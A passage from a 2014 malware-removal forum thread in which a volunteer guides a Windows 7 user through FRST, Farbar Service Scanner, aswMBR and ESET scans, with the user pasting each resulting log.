2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 17:54 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-20 17:53 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-21 21:05 - 00000728 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-21 20:45 - 00001290 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-21 21:09 - 2011-12-29 02:14 - 01747954 _____ () C:\Windows\WindowsUpdate.log
2014-10-21 21:05 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-21 21:05 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-21 21:05 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-21 21:05 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-21 20:42 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-21 20:42 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-21 20:40 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 19:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-21 19:13 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 16:23 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 11:11 - 2009-12-15 21:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================

 

 

Attached Files



#10 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 22 October 2014 - 09:26 AM

Please download Farbar Service Scanner and run it on the computer with the issue. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FSS icon and select Run as Administrator)
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#11 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 22 October 2014 - 08:33 PM

I think you got it.

Here is the log

 

-------------------------------------

 

Farbar Service Scanner Version: 21-07-2014
Ran by JP (administrator) on 22-10-2014 at 20:26:02
Running from "C:\Users\JP\Desktop"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:
=============

Firewall Disabled Policy:
==================

System Restore:
============

System Restore Disabled Policy:
========================

Action Center:
============

Windows Update:
============

Windows Autoupdate Disabled Policy:
============================

Other Services:
==============

File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****



#12 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 23 October 2014 - 07:06 AM

aswMBR

Please download aswMBR from one of the links below and save it to your Desktop.

Download Mirror #1

  • Right-click on aswMBR.exe and select Run as Administrator.
  • Click Yes when asked to download the Avast! definitions.
  • Click Scan to initiate the scan.
  • When the scan finishes, click Save Log and save this to your Desktop.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#13 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 23 October 2014 - 08:08 PM

Here is the log

 

------------------

 

aswMBR version 1.0.1.2161 Copyright© 2014 AVAST Software
Run date: 2014-10-23 19:48:30
-----------------------------
19:48:30.577    OS Version: Windows x64 6.1.7601 Service Pack 1
19:48:30.577    Number of processors: 8 586 0x1A05
19:48:30.577    ComputerName: JIM-PC  UserName: JP
19:48:31.000    Initialize success
19:48:31.023    VM: initialized successfully
19:48:31.056    VM: Intel CPU BiosDisabled
19:49:04.644    VM: disk I/O iaStor.sys
19:50:44.840    AVAST engine defs: 14102302
19:51:35.477    Disk 0  \Device\Harddisk0\DR0 -> \Device\Scsi\JRAID1Port0Path0Target0Lun0
19:51:35.479    Disk 0 Vendor: WDC_____ 150. Size: 1907729MB BusType: 8
19:51:35.481    Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\Ide\IAAStorageDevice-1
19:51:35.483    Disk 1 Vendor: SAMSUNG_ VT10 Size: 238475MB BusType: 8
19:51:35.605    Disk 1 MBR read successfully
19:51:35.608    Disk 1 MBR scan
19:51:35.611    Disk 1 unknown MBR code
19:51:35.618    Disk 1 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
19:51:35.622    Disk 1 default boot code
19:51:35.625    Disk 1 Partition 2 00     07    HPFS/NTFS NTFS       102587 MB offset 206848
19:51:35.630    Disk 1 Partition - 00     0F Extended LBA            123027 MB offset 210307072
19:51:35.660    Disk 1 Partition 3 00     07    HPFS/NTFS NTFS        12756 MB offset 462267777
19:51:35.691    Disk 1 Partition 4 00     07    HPFS/NTFS NTFS       123026 MB offset 210309120
19:51:35.723    Disk 1 scanning C:\Windows\system32\drivers
19:51:46.211    Service scanning
19:52:09.877    Modules scanning
19:52:09.881    Disk 1 trace - called modules:
19:52:09.901    ntoskrnl.exe CLASSPNP.SYS disk.sys iaStor.sys hal.dll
19:52:09.904    1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xfffffa800cce5060]
19:52:09.907    3 CLASSPNP.SYS[fffff88001b3e43f] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-1[0xfffffa800ab7f050]
19:52:10.376    AVAST engine scan C:\Windows
19:52:12.540    AVAST engine scan C:\Windows\system32
19:55:23.688    AVAST engine scan C:\Windows\system32\drivers
19:55:39.126    AVAST engine scan C:\Users\JP
19:59:51.766    File: C:\Users\JP\Documents\IP Cam\IP-Cam 1\Tools\Upgrade_tool\HFS.exe  **INFECTED** Win32:SFH-B [Tool]
19:59:54.846    File: C:\Users\JP\Documents\IP Cam\IP-Cam 2\Tools\Upgrade_tool\HFS.exe  **INFECTED** Win32:SFH-B [Tool]
20:00:47.885    AVAST engine scan C:\ProgramData
20:06:11.960    Disk 1 statistics 4043038/0/0 @ 3.28 MB/s
20:06:11.966    Scan finished successfully
20:06:37.568    Disk 1 MBR has been saved successfully to "C:\Users\JP\Desktop\MBR.dat"
20:06:37.571    The log file has been saved successfully to "C:\Users\JP\Desktop\aswMBR.txt"

---------------------------
 



#14 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 23 October 2014 - 11:48 PM

IMPORTANT: You MUST use Internet Explorer for this step!
  • Visit the ESET Online Scanner Web Page
  • Select the blue Run ESET Online Scanner button:
    ESET1_zps23a5e840.png
  • Tick the box next to YES, I accept the Terms of Use and click Start
    ESET_EULA2_zps9451f1c3.png
  • When asked, allow the ActiveX control to install.
  • Select Enable detection of potentially unwanted applications and select Advanced Settings:
    ESET2_zpsc701c045.png
  • Make sure to check the options Remove found threats and Enable Anti-Stealth technology are checked:
    ESET4_zps0afafd0d.png
  • Click Start. (This scan can take several hours, so please be patient):
    ESET3_zpsccd1657d.png
  • Once the scan is completed, select List of found threats:
    ESET5_zpsd27be299.png
  • Select Export to text file... and save the file as ESETlog.txt on your Desktop:
    ESET6_zpsc17d154e.png
  • Click the Back button.
  • Click the Finish button:
    ESET9_zps51587217.png
  • Use Notepad to open the saved log file (on your Desktop- ESET.txt)[/b]
  • Copy and paste that log as a reply to this topic.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#15 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 25 October 2014 - 02:54 AM

Here is the log

 

--------------------

 

C:\Users\JP\AppData\Local\Temp\Stub\-1478723801\bundle.tmp a variant of Win32/SBWatchman.A potentially unwanted application 
C:\Documents and Settings\JP\AppData\Local\Temp\Stub\-1478723801\bundle.tmp a variant of Win32/SBWatchman.A potentially unwanted application deleted - quarantined
 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users